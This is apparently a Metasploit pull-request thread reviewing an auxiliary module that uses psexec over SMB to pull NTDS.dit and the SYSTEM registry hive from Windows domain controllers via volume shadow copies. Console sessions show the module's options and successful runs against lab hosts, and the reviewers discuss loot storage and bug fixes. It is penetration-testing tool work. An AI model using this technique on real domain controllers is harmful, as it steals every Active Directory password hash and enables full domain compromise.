Added Auxiliary Module ntdsgrab.rb

[R3dy]

This module uses the psexec Mixin to extract NTDS.dit and the SYSTEM registry hive from a Windows Domain Controller.

Reference:
http://blog.accuvant.com/blog/owning-computers-without-shell-access

The module can be used in three seperate ways.

Check if a volume shadow copy already exists and pull from there:

msf  auxiliary(ntdsgrab) > run

[*] 10.0.10.132:445 - Checking if a Volume Shadow Copy exists already.
[+] 10.0.10.132:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy74
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Create a new Volume Shadow Copy and pull from there:

msf  auxiliary(ntdsgrab) > set CREATE_NEW_VSC true
CREATE_NEW_VSC => true
msf  auxiliary(ntdsgrab) > run

[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy75
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Target a specific user-defined Volume Shadow Copy and pull form there:

msf  auxiliary(ntdsgrab) > set VSCPATH '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70'
VSCPATH => \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70
msf  auxiliary(ntdsgrab) > run

[*] 10.0.10.132:445 - Attempting to copy NTDS.dit from \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy70
[*] 10.0.10.132:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 10.0.10.132:445 - Executing cleanup...
[*] 10.0.10.132:445 - Cleanup was successful
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

[R3dy]

Alright I can't figure out how to get rid of this data from a previous pull request. Hopefully it doesn't mater :)

[L1ghtn1ng]

Please add the license terms at the very top of the module see another module for example

[todb-r7]

Alright I can't figure out how to get rid of this data from a previous pull request.

You're right, it shouldn't matter at all, assuming everything merges cleanly at the end. History is important.

[jlee-r7]

This shouldn't be a scanner.

[jvazquez-r7]

I dont think it is the best way to store the ntds.dit and SYSTEM hive.

My feeling is store_loot could be used to store them, and in this way you can also track collected loots/objects in the db if you're using.

Any inconvenient with using store_loot here?

[R3dy]

I will look into store_loot. The only reason I did it this way was so that I could use a separate tool that I built ntds_hashextract.rb to retrieve the Active Directory password hashes and it is convient for the two files to be in the same directory. Can this be achieved with store_loot?

[jlee-r7]

store_loot puts everything under ~/.msf4/loot/ but that may not always be the case.

[jvazquez-r7]

Deployed a single DC and tried

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  false            no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.133    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.133:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.133:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.133:445 - Checking if NTDS.dit was copied.
[-] 192.168.1.133:445 - Failed to find a volume shadow copy.  Issuing cleanup command sequence.
[*] 192.168.1.133:445 - Executing cleanup...
[*] 192.168.1.133:445 - Cleanup was successful
[*] Auxiliary module execution completed

Any clue about what could be wrong? (I've checked ntds.dit exists con c:\windows\ntds\ntds.dit).

Feel free to ask me to provide any information.

[R3dy]

By any chance could you try running it with CREATE_NEW_VSC set to 'true' and tell me if there is any difference?

Thanks!

[jvazquez-r7]

Sure, successful with CREATE_NEW_VSC as true:

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  true             no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.134    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > run

[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.134:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.134:445 - Executing cleanup...
[*] 192.168.1.134:445 - Cleanup was successful
[*] Auxiliary module execution completed

[R3dy]

Ok so here is what I would like you to try next if you don't mind.

Try it again with CREATE_NEW_VSC set to false. and tell me if it works, My guess is that it will work and I had an off by one error whereby my check to see if a VSC is present requires there to be at least two and in this canse when you spun up a new DC that has only one shadow copy my off by one triggered a false negative.

If you try it again and it sitll produces the same error. Can you check for m ein the c:\windows\temp directory and tell me if there is a file called "ntds" and or "sys"?

Thanks man!

[jvazquez-r7]

Setting it again to false works :)

msf  auxiliary(ntdsgrab) > show options

Module options (auxiliary/admin/smb/ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  true             no        If true, attempts to create a volume shadow copy
   RHOST           192.168.1.134    yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       SMALLBUSINESS    no        The Windows domain to use for authentication
   SMBPass         juan             no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser         Administrator    no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(ntdsgrab) > set CREATE_NEW_VSC false
CREATE_NEW_VSC => false
msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.134:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.134:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.134:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.134:445 - Executing cleanup...
[*] 192.168.1.134:445 - Cleanup was successful
[*] Auxiliary module execution completed

[R3dy]

I am unable to replicate this error. If you try it again on a fresh DC do you still get the same error? I have deleted all Volume Shadow copies on my system to see if that was the issue and it is still working.

[jvazquez-r7]

Tried again in a fresh DC:

msf  auxiliary(ntdsgrab) > run

[*] 192.168.1.135:445 - Checking if a Volume Shadow Copy exists already.
[*] 192.168.1.135:445 - No VSC Found.
[*] Creating Volume Shadow Copy
[+] Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] Downloading ntds.dit file
[*] Downloading SYSTEM hive file
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed

weird :s now it's working in the first shot....

Oka will give a new and last shot tomorrow, if works, after last code cleanup I think we'll be ready to merge :)

thanks!

[jvazquez-r7]

There isn't needed a simple.disconnect("\#{ip}#{@SMBSHARE}") as in download_ntds? just asking :)

[R3dy]

Yes there should be, fixed.

[jvazquez-r7]

Did last cleanup:

7403239

And tested with an existing VSC and creating a new one. Working, so merged! Thanks @R3dy !!

msf  auxiliary(psexec_ntdsgrab) > show options

Module options (auxiliary/admin/smb/psexec_ntdsgrab):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CREATE_NEW_VSC  false            no        If true, attempts to create a volume shadow copy
   RHOST                            yes       The target address
   RPORT           445              yes       Set the SMB service port
   SMBDomain       WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                          no        The password for the specified username
   SMBSHARE        C$               yes       The name of a writeable share on the server
   SMBUser                          no        The username to authenticate as
   VSCPATH                          no        The path to the target Volume Shadow Copy
   WINPATH         WINDOWS          yes       The name of the Windows directory (examples: WINDOWS, WINNT)

msf  auxiliary(psexec_ntdsgrab) > set rhost 192.168.1.135
rhost => 192.168.1.135
msf  auxiliary(psexec_ntdsgrab) > set SMBDomain SMALLBUSINESS
SMBDomain => SMALLBUSINESS
msf  auxiliary(psexec_ntdsgrab) > set SMBPass juan
SMBPass => juan
msf  auxiliary(psexec_ntdsgrab) > set SMBUser Administrator
SMBUser => Administrator
msf  auxiliary(psexec_ntdsgrab) > run

[*] 192.168.1.135:445 - Checking if a Volume Shadow Copy exists already.
[+] 192.168.1.135:445 - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] 192.168.1.135:445 - Downloading ntds.dit file
[+] 192.168.1.135:445 - ntds.dit stored at /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit
[*] 192.168.1.135:445 - Downloading SYSTEM hive file
[+] 192.168.1.135:445 - SYSTEM hive stored at /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed
msf  auxiliary(psexec_ntdsgrab) > file /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit
[*] exec: file /Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit

/Users/juan/.msf4/loot/20130314133631_default_192.168.1.135_psexec.ntdsgrab._378404.dit: data
msf  auxiliary(psexec_ntdsgrab) > file /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin
[*] exec: file /Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin

/Users/juan/.msf4/loot/20130314133633_default_192.168.1.135_psexec.ntdsgrab._264239.bin: MS Windows registry file, NT/2000 or above
msf  auxiliary(psexec_ntdsgrab) > set CREATE_NEW_VSC true
CREATE_NEW_VSC => true
msf  auxiliary(psexec_ntdsgrab) > run

[*] 192.168.1.135:445 - Creating Volume Shadow Copy
[+] 192.168.1.135:445 - Volume Shadow Copy created on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
[*] 192.168.1.135:445 - Checking if NTDS.dit was copied.
[*] 192.168.1.135:445 - Downloading ntds.dit file
[+] 192.168.1.135:445 - ntds.dit stored at /Users/juan/.msf4/loot/20130314133722_default_192.168.1.135_psexec.ntdsgrab._291883.dit
[*] 192.168.1.135:445 - Downloading SYSTEM hive file
[+] 192.168.1.135:445 - SYSTEM hive stored at /Users/juan/.msf4/loot/20130314133726_default_192.168.1.135_psexec.ntdsgrab._791823.bin
[*] 192.168.1.135:445 - Executing cleanup...
[*] 192.168.1.135:445 - Cleanup was successful
[*] Auxiliary module execution completed